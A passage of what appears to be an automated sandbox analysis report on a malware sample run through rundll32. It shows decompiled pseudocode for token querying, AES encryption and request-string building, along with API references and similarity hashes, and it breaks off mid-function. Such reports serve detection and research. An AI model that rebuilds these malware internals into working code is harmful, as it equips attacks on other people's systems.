0x02e375c9
0x02e37613
0x02e37615
0x02e37615
0x02e375cd
0x02e375d3
0x02e375d8
0x02e375dc
0x02e375e2
0x02e375e9
0x00000000
0x00000000
0x02e375eb
0x02e375f0
0x00000000
0x00000000
0x00000000
0x02e375f0
0x02e375f2
0x02e375fa
0x02e375fd
0x02e375fd
0x02e37603
0x02e3760a
0x02e3760d
0x02e3760d
0x00000000

APIs

SetEvent.KERNEL32(000002C0,00000001,02E3394C), ref: 02E375CD
SleepEx.KERNEL32(00000064,00000001), ref: 02E375DC
CloseHandle.KERNEL32(000002C0), ref: 02E375FD
HeapDestroy.KERNEL32(04AB0000), ref: 02E3760D

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: c2ede1a82c32be8861178cb895c6d83d3ea6634de7a5b1a5ed67a0cc2a45a726
Instruction ID: d40668e81f221019a74593bd3d14d3294206e5f38574b21563c8011388625ced
Opcode Fuzzy Hash: c2ede1a82c32be8861178cb895c6d83d3ea6634de7a5b1a5ed67a0cc2a45a726
Instruction Fuzzy Hash: 0CF037B5EC031597D7215B3BE84CB5677D8AB04767B445950BC01D33C2CB70D4D0D960

Uniqueness

Uniqueness Score: -1.00%

Function 02E33969 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E33969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02E33D2E(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E02E31940(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E02E36BEB(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x2e3a2d8, 0, _t25);
				}
				return _t22;
			}

0x02e33969
0x02e3397a
0x02e3397e
0x02e339d9
0x02e33980
0x02e33987
0x02e3398f
0x02e33997
0x02e3399b
0x02e339a1
0x02e339a9
0x02e339ac
0x02e339c4
0x02e339c4
0x02e339cf
0x02e339cf
0x02e339e0

APIs

Part of subcall function 02E33D2E: lstrlen.KERNEL32(?,00000000,04EA9DC0,00000000,02E3695F,04EA9FE3,69B25F44,?,?,?,?,69B25F44,00000005,02E3A00C,4D283A53,?), ref: 02E33D35
Part of subcall function 02E33D2E: mbstowcs.NTDLL ref: 02E33D5E
Part of subcall function 02E33D2E: memset.NTDLL ref: 02E33D70

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,04EA93CC), ref: 02E339A1
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74715520,00000008,00000014,004F0053,04EA93CC), ref: 02E339CF

Strings

Uqt, xrefs: 02E339CF

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uqt
API String ID: 1500278894-2320327147
Opcode ID: ba014e6d7db165524e29c5eb6369c5db2c311dcf35d122c811064134a520240b
Instruction ID: d59efa72e835a3c0e46da306d136868fe2df802f65b3876308927bcbd1e3f465
Opcode Fuzzy Hash: ba014e6d7db165524e29c5eb6369c5db2c311dcf35d122c811064134a520240b
Instruction Fuzzy Hash: 6601D435280209BBDB225F65DC48F9B3BB9FF84716F404426FA449A160DB71C864CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E3534A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02E3534A(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x2e3a340;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x2e3a2f4; // 0x2c4
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x2e3a348; // 0x206d5a8
				_t3 = _t12 + 0x2e3b0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x2e3a348; // 0x206d5a8
				_t4 = _t17 + 0x2e3b9e0; // 0x6f577349
				 *0x2e3a314 = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x2e3a340 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x02e3534e
0x02e35353
0x02e35358
0x02e35360
0x02e35396
0x02e35398
0x02e3539f
0x02e353a3
0x02e353a5
0x02e353a5
0x02e353a3
0x02e353a8
0x02e353ad
0x02e353ad
0x02e35362
0x02e35367
0x02e3536e
0x02e35374
0x02e3537a
0x02e35382
0x02e35387
0x02e3538d
0x02e35394
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000001,?,?,02E37307,?,?), ref: 02E3536E
GetProcAddress.KERNEL32(00000000,6F577349), ref: 02E35387

Strings

Nqt, xrefs: 02E35387

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Nqt
API String ID: 1646373207-806837294
Opcode ID: 64a17b34f8fcc29abbcf98c5ead54f401ad42c5da99b683801a77602d76476b4
Instruction ID: bd22c6569c09f35d03dcc5bbb8c4d19539bb53bf049f3108985921664951263b
Opcode Fuzzy Hash: 64a17b34f8fcc29abbcf98c5ead54f401ad42c5da99b683801a77602d76476b4
Instruction Fuzzy Hash: 6BF03771EC120AEBCB11CB56D94CAAA73BCEB0830BB80086CE401D3300E7B4EA94CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E3452E Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02E3452E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02E37A71(_t2);
				if(_t34 != 0) {
					_t30 = E02E37A71(_t28);
					if(_t30 == 0) {
						E02E3789E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02E37ABF(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02E37ABF(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02e3452e
0x02e34538
0x02e3453a
0x02e34540
0x02e34540
0x02e34549
0x02e3454d
0x02e34559
0x02e3455d
0x02e345d1
0x02e3455f
0x02e3455f
0x02e34563
0x02e34568
0x02e3456d
0x02e34587
0x02e34576
0x02e34576
0x02e3457a
0x02e3457d
0x02e34582
0x02e34582
0x02e3458c
0x02e345b4
0x02e345ba
0x02e345bd
0x02e3458e
0x02e34590
0x02e34598
0x02e345a3
0x02e345a8
0x02e345a8
0x02e345c4
0x02e345cb
0x02e345cc
0x02e345cc
0x02e3455d
0x02e345dc

APIs

lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02E32C92,?,?,?,?,00000102,02E35D46,?,?,747581D0), ref: 02E3453A

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

Part of subcall function 02E37ABF: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02E34568,00000000,00000001,00000001,?,?,02E32C92,?,?,?,?,00000102), ref: 02E37ACD
Part of subcall function 02E37ABF: StrChrA.SHLWAPI(?,0000003F,?,?,02E32C92,?,?,?,?,00000102,02E35D46,?,?,747581D0,00000000), ref: 02E37AD7

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02E32C92,?,?,?,?,00000102,02E35D46,?), ref: 02E34598
lstrcpy.KERNEL32(00000000,00000000), ref: 02E345A8
lstrcpy.KERNEL32(00000000,00000000), ref: 02E345B4

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: fc4bc6f84e5f8cd80fea30b8a486973cc024489bcbd62ae9f8e57260ff948090
Instruction ID: b5899eb591ea1abbe114ec6ef81031b2517835c9344a3081313c84ff45f14950
Opcode Fuzzy Hash: fc4bc6f84e5f8cd80fea30b8a486973cc024489bcbd62ae9f8e57260ff948090
Instruction Fuzzy Hash: 25219373984255BBCB136F64DC4CAAABFE9AF06395B04D054F8059B251DB71CA11CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02E3262D Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E3262D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02E37A71(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02e32642
0x02e32646
0x02e32650
0x02e32655
0x02e3265a
0x02e3265c
0x02e32664
0x02e32669
0x02e32677
0x02e3267c
0x02e32686

APIs

lstrlenW.KERNEL32(004F0053,?,74715520,00000008,04EA93CC,?,02E3627D,004F0053,04EA93CC,?,?,?,?,?,?,02E3521B), ref: 02E3263D
lstrlenW.KERNEL32(02E3627D,?,02E3627D,004F0053,04EA93CC,?,?,?,?,?,?,02E3521B), ref: 02E32644

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

memcpy.NTDLL(00000000,004F0053,747169A0,?,?,02E3627D,004F0053,04EA93CC,?,?,?,?,?,?,02E3521B), ref: 02E32664
memcpy.NTDLL(747169A0,02E3627D,00000002,00000000,004F0053,747169A0,?,?,02E3627D,004F0053,04EA93CC), ref: 02E32677

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: ec7d3e6101b43ccf8e94180eccfca39c9ab71cb995f0a077785bca0840544554
Instruction ID: bebfb4af7317c9f56cc1c61f3fcb3e9b50919b7e4fc6ecef857639b1c391691d
Opcode Fuzzy Hash: ec7d3e6101b43ccf8e94180eccfca39c9ab71cb995f0a077785bca0840544554
Instruction Fuzzy Hash: 18F03C76900119BB8F11DBA9CC88C9EBBADEF083A57018062F90497211E731EE10CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 02E36311 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04EA9BB8,00000000,00000000,00000000,02E3385C,00000000), ref: 02E36321
lstrlen.KERNEL32(?), ref: 02E36329

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

lstrcpy.KERNEL32(00000000,04EA9BB8), ref: 02E3633D
lstrcat.KERNEL32(00000000,?), ref: 02E36348

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 60d3d8f4beb3bfa8e825e255690da941378f37e60195d7a72dddbd4c84f26912
Instruction ID: 8b30b29d3e2b9f8f1f74699484d89e3fd3a41c98ed1b21a49206f4e4ededb789
Opcode Fuzzy Hash: 60d3d8f4beb3bfa8e825e255690da941378f37e60195d7a72dddbd4c84f26912
Instruction Fuzzy Hash: 00E06D73981628A787125AA9AC4CC6BFAADEF89652304481AF60093101C772C821CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 780, Parent PID: 4124COMMON

Executed Functions

Function 045E47E5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E045E47E5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x45ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x45ea0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E045E7A71(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x45ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x45ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E045E789E(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x045e47ee
0x045e47f4
0x045e47f7
0x045e47fd
0x045e47fd
0x045e47ff
0x045e4801
0x045e4804
0x045e480a
0x045e480b
0x045e480c
0x045e4812
0x045e4817
0x045e481d
0x045e4825
0x045e4982
0x045e482b
0x045e482d
0x045e4836
0x045e483b
0x045e484d
0x045e4850
0x045e4854
0x045e485b
0x045e485f
0x045e4867
0x045e496d
0x045e486d
0x045e486d
0x045e4871
0x045e4872
0x045e4874
0x045e487f
0x045e4959
0x045e4885
0x045e4885
0x045e4888
0x045e488e
0x045e4894
0x045e4894
0x045e489c
0x045e489e
0x045e48a3
0x045e494a
0x045e48a9
0x045e48af
0x045e48b2
0x045e48b5
0x045e48b7
0x045e48b8
0x045e48bd
0x045e48bf
0x045e48bf
0x045e48c9
0x045e48ce
0x045e48d1
0x045e48d4
0x045e48d6
0x045e48df
0x045e4909
0x045e48e1
0x045e48f2
0x045e48f2
0x045e4911
0x00000000
0x00000000
0x045e4913
0x045e4916
0x045e4919
0x045e491d
0x00000000
0x045e491f
0x045e492e
0x045e4934
0x045e493c
0x045e493c
0x00000000
0x045e491d
0x045e4921
0x045e4927
0x045e492c
0x045e4943
0x00000000
0x00000000
0x00000000
0x045e492c
0x045e48a3
0x045e495c
0x045e495f
0x045e495f
0x045e4974
0x045e4974
0x045e498c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,045E44FD,00000001,045E3831,00000000), ref: 045E481D
memcpy.NTDLL(045E44FD,045E3831,00000010,?,?,?,045E44FD,00000001,045E3831,00000000,?,045E22E5,00000000,045E3831,?,775EC740), ref: 045E4836
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 045E485F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 045E4877
memcpy.NTDLL(00000000,775EC740,04FF9600,00000010), ref: 045E48C9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,04FF9600,00000020,?,?,00000010), ref: 045E48F2
GetLastError.KERNEL32(?,?,00000010), ref: 045E4921
GetLastError.KERNEL32 ref: 045E4953
CryptDestroyKey.ADVAPI32(00000000), ref: 045E495F
GetLastError.KERNEL32 ref: 045E4967
CryptReleaseContext.ADVAPI32(?,00000000), ref: 045E4974
GetLastError.KERNEL32(?,?,?,045E44FD,00000001,045E3831,00000000,?,045E22E5,00000000,045E3831,?,775EC740,045E3831,00000000,04FF9600), ref: 045E497C

Strings

@MqtNqt, xrefs: 045E4921, 045E4953, 045E4967, 045E497C

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID: @MqtNqt
API String ID: 3401600162-2883916605
Opcode ID: 6022aed6a7db65a20217ee30073709c211c62859bcf38aa26f92934b3176ef60
Instruction ID: ba4b34250fdb01f38751a0cfb5e546f18369d97629a2ec6e633b5427ac0be097
Opcode Fuzzy Hash: 6022aed6a7db65a20217ee30073709c211c62859bcf38aa26f92934b3176ef60
Instruction Fuzzy Hash: 5E515CB1900249FFDF14DFA6DC88AAEBBB9FB45350F008425FA15E6240D734AE14EB61

Uniqueness

Uniqueness Score: -1.00%

Function 045E737C Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E045E737C(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E045E7A71(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E045E789E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x045e7389
0x045e738a
0x045e738b
0x045e738c
0x045e738d
0x045e7391
0x045e7398
0x045e73a7
0x045e73aa
0x045e73ad
0x045e73b4
0x045e73b7
0x045e73ba
0x045e73bd
0x045e73c0
0x045e73cb
0x045e73cd
0x045e73d6
0x045e73de
0x045e73e0
0x045e73f2
0x045e73fc
0x045e7400
0x045e740f
0x045e7413
0x045e741c
0x045e7424
0x045e7424
0x045e7426
0x045e7426
0x045e742e
0x045e7434
0x045e7438
0x045e7438
0x045e7443

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 045E73C3
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 045E73D6
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 045E73F2

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 045E740F
memcpy.NTDLL(?,00000000,0000001C), ref: 045E741C
NtClose.NTDLL(?), ref: 045E742E
NtClose.NTDLL(00000000), ref: 045E7438

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 49e987fa06b040ead5889ea2062586efdb053f99eca2bb9faf1fda094724ee40
Instruction ID: 5b10c3f0378648ea97a1d902d537620fdff8def8e53a3590381daa1e81913281
Opcode Fuzzy Hash: 49e987fa06b040ead5889ea2062586efdb053f99eca2bb9faf1fda094724ee40
Instruction Fuzzy Hash: 9B2107B2900229BBDB059FA6CC84AEEBFBDFF48750F104066F905A6110D7759B44EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 045E3643 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E045E3643(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x45ea3e0; // 0x4ff9bc8
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x45ea2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x45ea018; // 0xe8f22e63
					asm("bswap eax");
					_t34 =  *0x45ea014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x45ea010; // 0xd8d2f808
					asm("bswap eax");
					_t36 = E045EA00C; // 0x81762942
					asm("bswap eax");
					_t37 =  *0x45ea348; // 0xa0d5a8
					_t3 = _t37 + 0x45eb62b; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d186, _t36, _t35, _t34, _t33,  *0x45ea02c,  *0x45ea004, _t112);
					_t40 = E045E1308();
					_t41 =  *0x45ea348; // 0xa0d5a8
					_t4 = _t41 + 0x45eb66b; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x45ea348; // 0xa0d5a8
